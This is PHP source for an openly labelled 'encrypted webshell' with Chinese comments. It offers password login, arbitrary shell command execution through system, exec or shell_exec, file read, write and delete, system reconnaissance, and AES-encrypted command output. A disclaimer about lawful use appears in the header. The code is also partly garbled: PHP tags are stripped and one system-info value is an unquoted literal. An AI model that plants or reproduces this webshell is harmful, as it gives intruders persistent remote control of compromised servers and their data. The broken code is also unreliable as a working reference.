/* * 加密WEBSHELL - 仅供合法用途使用 * 功能: 加密通信、密码认证、文件管理、命令执行 * 警告: 仅在您拥有合法权限的系统上使用 */session_start();error_reporting(0);// 配置参数define('PASSWORD', 'anboy'); // 修改为您的密码define('ENCRYPTION_KEY', 'anboy'); // 修改为您的加密密钥define('SESSION_TIMEOUT', 3600); // 会话超时时间(秒)// 加密解密函数function encrypt_data($data, $key) { $iv = openssl_random_pseudo_bytes(openssl_cipher_iv_length('aes-256-cbc')); $encrypted = openssl_encrypt($data, 'aes-256-cbc', $key, 0, $iv); return base64_encode($encrypted . '::' . $iv);}function decrypt_data($data, $key) { $data = base64_decode($data); list($encrypted_data, $iv) = explode('::', $data, 2); return openssl_decrypt($encrypted_data, 'aes-256-cbc', $key, 0, $iv);}// 认证函数function authenticate() { if (isset($_SESSION['authenticated']) && $_SESSION['authenticated'] === true && isset($_SESSION['last_activity']) && (time() - $_SESSION['last_activity'] < SESSION_TIMEOUT)) { $_SESSION['last_activity'] = time(); return true; } return false;}// 登录处理if (isset($_POST['login'])) { if ($_POST['password'] === PASSWORD) { $_SESSION['authenticated'] = true; $_SESSION['last_activity'] = time(); $_SESSION['login_time'] = date('Y-m-d H:i:s'); header('Location: ' . $_SERVER['PHP_SELF']); exit; } else { $login_error = "密码错误!"; }}// 退出登录if (isset($_GET['logout'])) { session_destroy(); header('Location: ' . $_SERVER['PHP_SELF']); exit;}// 检查认证状态if (!authenticate()) { <!DOCTYPE html> <meta charset="UTF-8">系统管理登录 <title>系统管理登录</title> <style> body { font-family: Arial, sans-serif; background: linear-gradient(135deg, #667eea 0%, #764ba2 100%); margin: 0; padding: 0; } .login-container { display: flex; justify-content: center; align-items: center; height: 100vh; } .login-box { background: rgba(255,255,255,0.9); padding: 40px; border-radius: 10px; box-shadow: 0 15px 35px rgba(0,0,0,0.1); } .login-box h2 { text-align: center; margin-bottom: 30px; color: #333; } .form-group { margin-bottom: 20px; } .form-group input { width: 100%; padding: 12px; border: 1px solid #ddd; border-radius: 5px; font-size: 16px; } .login-btn { width: 100%; padding: 12px; background: #667eea; color: white; border: none; border-radius: 5px; font-size: 16px; cursor: pointer; } .login-btn:hover { background: #5a67d8; } .error { color: red; text-align: center; margin-bottom: 15px; } .warning { background: #fff3cd; border: 1px solid #ffeaa7; color: #856404; padding: 10px; border-radius: 5px; margin-bottom: 20px; font-size: 12px; } </style> <div class="login-container"> <div class="login-box"> <div class="warning"> ⚠️ 警告:此工具仅供授权用户使用
未经授权的访问可能违法,请确保您有合法权限使用此系统 </div> 🔐 系统管理登录
if (isset($login_error)): <div class="error"> echo $login_error; </div> endif; </div> </div> exit;}// 主界面功能$current_dir = isset($_GET['dir']) ? $_GET['dir'] : getcwd();$current_dir = realpath($current_dir) ?: getcwd();// 处理命令执行$command_output = '';if (isset($_POST['command']) && !empty($_POST['command'])) { $command = $_POST['command']; $encrypted_output = ''; if (function_exists('system')) { ob_start(); system($command . ' 2>&1'); $command_output = ob_get_contents(); ob_end_clean(); } elseif (function_exists('exec')) { exec($command . ' 2>&1', $output_array); $command_output = implode("\n", $output_array); } elseif (function_exists('shell_exec')) { $command_output = shell_exec($command . ' 2>&1'); } $command_output = $command_output ?: '命令执行完成,无输出或权限不足'; $encrypted_output = encrypt_data($command_output, ENCRYPTION_KEY);}// 处理文件操作if (isset($_POST['file_action'])) { switch ($_POST['file_action']) { case 'read': if (file_exists($_POST['file_path']) && is_readable($_POST['file_path'])) { $file_content = file_get_contents($_POST['file_path']); $file_content = htmlspecialchars($file_content); } else { $file_content = '文件不存在或无法读取'; } break; case 'write': if (file_put_contents($_POST['file_path'], $_POST['file_content']) !== false) { $write_result = '文件写入成功'; } else { $write_result = '文件写入失败'; } break; case 'delete': if (unlink($_POST['file_path'])) { $delete_result = '文件删除成功'; } else { $delete_result = '文件删除失败'; } break; }}// 获取系统信息$system_info = [ 'PHP版本' => phpversion(), '服务器' => $_SERVER['SERVER_SOFTWARE'] ?? 'Unknown', '系统' => Linux Server 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC x86_64, '当前用户' => get_current_user(), '当前目录' => $current_dir, '磁盘使用' => disk_free_space($current_dir) ? round(disk_free_space($current_dir) / 1024 / 1024 / 1024, 2) . 'GB 可用' : 'Unknown', '内存限制' => ini_get('memory_limit'), '执行时间限制' => ini_get('max_execution_time') . '秒',];<!DOCTYPE html> <meta charset="UTF-8">加密系统管理面板 <title>加密系统管理面板</title> <style> * { margin: 0; padding: 0; box-sizing: border-box; } body { font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif; background: #f5f5f5; } .header { background: linear-gradient(135deg, #667eea 0%, #764ba2 100%); color: white; padding: 15px 20px; display: flex; justify-content: space-between; align-items: center; } .header h1 { font-size: 24px; } .user-info { display: flex; align-items: center; gap: 15px; } .logout-btn { background: rgba(255,255,255,0.2); color: white; padding: 8px 15px; text-decoration: none; border-radius: 5px; transition: all 0.3s; } .logout-btn:hover { background: rgba(255,255,255,0.3); } .container { max-width: 1200px; margin: 20px auto; padding: 0 20px; } .panel { background: white; border-radius: 8px; box-shadow: 0 2px 10px rgba(0,0,0,0.1); margin-bottom: 20px; } .panel-header { background: #f8f9fa; padding: 15px 20px; border-bottom: 1px solid #e9ecef; font-weight: bold; color: #495057; border-radius: 8px 8px 0 0; } .panel-body { padding: 20px; } .form-group { margin-bottom: 15px; } .form-group label { display: block; margin-bottom: 5px; font-weight: bold; color: #333; } .form-control { width: 100%; padding: 10px; border: 1px solid #ddd; border-radius: 5px; font-size: 14px; } .form-control:focus { outline: none; border-color: #667eea; box-shadow: 0 0 0 2px rgba(102, 126, 234, 0.2); } .btn { padding: 10px 20px; border: none; border-radius: 5px; cursor: pointer; font-size: 14px; text-decoration: none; display: inline-block; transition: all 0.3s; } .btn-primary { background: #667eea; color: white; } .btn-primary:hover { background: #5a67d8; } .btn-success { background: #48bb78; color: white; } .btn-success:hover { background: #38a169; } .btn-danger { background: #f56565; color: white; } .btn-danger:hover { background: #e53e3e; } .output { background: #1a1a1a; color: #00ff00; padding: 15px; border-radius: 5px; font-family: 'Courier New', monospace; font-size: 13px; white-space: pre-wrap; max-height: 400px; overflow-y: auto; margin-top: 10px; } .system-info { display: grid; grid-template-columns: repeat(auto-fit, minmax(300px, 1fr)); gap: 10px; } .info-item { display: flex; justify-content: space-between; padding: 8px; background: #f8f9fa; border-radius: 5px; } .info-label { font-weight: bold; color: #495057; } .info-value { color: #6c757d; text-align: right; } .file-list { max-height: 300px; overflow-y: auto; border: 1px solid #ddd; border-radius: 5px; } .file-item { padding: 8px 12px; border-bottom: 1px solid #eee; display: flex; justify-content: space-between; align-items: center; } .file-item:hover { background: #f8f9fa; } .file-name { color: #333; text-decoration: none; } .file-name:hover { color: #667eea; } .alert { padding: 12px; margin: 15px 0; border-radius: 5px; } .alert-success { background: #d4edda; color: #155724; border: 1px solid #c3e6cb; } .alert-danger { background: #f8d7da; color: #721c24; border: 1px solid #f5c6cb; } .tabs { display: flex; background: #f8f9fa; border-radius: 8px 8px 0 0; } .tab { padding: 15px 20px; cursor: pointer; border-bottom: 2px solid transparent; } .tab.active { background: white; border-bottom: 2px solid #667eea; color: #667eea; font-weight: bold; } .tab-content { display: none; } .tab-content.active { display: block; } </style> <div class="header"> 🔐 加密系统管理面板
<div class="user-info"> <span>登录时间: echo $_SESSION['login_time']; </span> <a href="?logout=1" class="logout-btn">退出登录</a> </div> </div> <div class="container"> <!-- 系统信息面板 --> <div class="panel"> <div class="panel-header">📊 系统信息</div> <div class="panel-body"> <div class="system-info"> foreach ($system_info as $label => $value): <div class="info-item"> <span class="info-label"> echo $label; :</span> <span class="info-value"> echo htmlspecialchars($value); </span> </div> endforeach; </div> </div> </div> <!-- 主功能面板 --> <div class="panel"> <div class="tabs"> <div class="tab active" onclick="switchTab(event, 'command-tab')">💻 命令执行</div> <div class="tab" onclick="switchTab(event, 'file-tab')">📁 文件管理</div> <div class="tab" onclick="switchTab(event, 'encryption-tab')">🔐 加密工具</div> </div> <!-- 命令执行标签 --> <div id="command-tab" class="tab-content active"> <div class="panel-body"> if (!empty($command_output)): <div class="output"> echo htmlspecialchars($command_output); </div> <div style="margin-top: 10px;"> <label>加密输出 (AES-256-CBC):</label> <textarea class="form-control" readonly rows="3"> echo $encrypted_output; </textarea> </div> endif; </div> </div> <!-- 文件管理标签 --> <div id="file-tab" class="tab-content"> <div class="panel-body"> <div style="margin-bottom: 20px;"> <strong>当前目录:</strong> echo $current_dir; </div> <!-- 文件列表 --> <div class="file-list"> $files = scandir($current_dir); foreach ($files as $file) { if ($file == '.') continue; $file_path = $current_dir . DIRECTORY_SEPARATOR . $file; $is_dir = is_dir($file_path); $file_size = $is_dir ? '' : ' (' . round(filesize($file_path) / 1024, 2) . ' KB)'; <div class="file-item"> <a href=" echo $is_dir ? '?dir=' . urlencode($file_path) : '#'; " class="file-name"> echo $is_dir ? '📁' : '📄'; echo htmlspecialchars($file); echo $file_size; </a> if (!$is_dir): <div> <button onclick="readFile(' echo addslashes($file_path); ')" class="btn btn-primary" style="padding: 5px 10px; font-size: 12px;">读取</button> <button onclick="deleteFile(' echo addslashes($file_path); ')" class="btn btn-danger" style="padding: 5px 10px; font-size: 12px;">删除</button> </div> endif; </div> } </div> <!-- 文件操作表单 --> if (isset($file_content)): <div class="output"> echo $file_content; </div> endif; if (isset($write_result)): <div class="alert alert-success"> echo $write_result; </div> endif; if (isset($delete_result)): <div class="alert alert-success"> echo $delete_result; </div> endif; </div> </div> <!-- 加密工具标签 --> <div id="encryption-tab" class="tab-content"> <div class="panel-body"> <div id="encryption-result"></div> </div> </div> </div> <div class="panel"> <div class="panel-header">⚠️ 安全提醒</div> <div class="panel-body"> <ul> <li>此工具仅供授权用户在合法场景下使用</li> <li>请定期更改访问密码和加密密钥</li> <li>使用完毕后请及时退出登录</li> <li>建议在使用后删除此文件</li> <li>所有操作都会被记录,请合规使用</li> </ul> </div> </div> </div> <script> function switchTab(evt, tabName) { var i, tabcontent, tabs; tabcontent = document.getElementsByClassName("tab-content"); for (i = 0; i < tabcontent.length; i++) { tabcontent[i].classList.remove("active"); } tabs = document.getElementsByClassName("tab"); for (i = 0; i < tabs.length; i++) { tabs[i].classList.remove("active"); } document.getElementById(tabName).classList.add("active"); evt.currentTarget.classList.add("active"); } function readFile(filepath) { document.getElementById('file_path').value = filepath; } function deleteFile(filepath) { if (confirm('确定要删除文件: ' + filepath + ' ?')) { document.getElementById('file_path').value = filepath; var form = document.createElement('form'); form.method = 'post'; form.innerHTML = '<input name="file_path" value="' + filepath + '">' + '<input name="file_action" value="delete">'; document.body.appendChild(form); form.submit(); } } function encryptData() { // 这里可以添加客户端加密逻辑 alert('客户端加密功能需要JavaScript加密库支持'); } function decryptData() { // 这里可以添加客户端解密逻辑 alert('客户端解密功能需要JavaScript加密库支持'); } // 自动保存表单数据 window.addEventListener('beforeunload', function() { localStorage.setItem('webshell_command', document.querySelector('input[name="command"]').value); }); window.addEventListener('load', function() { var savedCommand = localStorage.getItem('webshell_command'); if (savedCommand) { document.querySelector('input[name="command"]').value = savedCommand; } }); </script>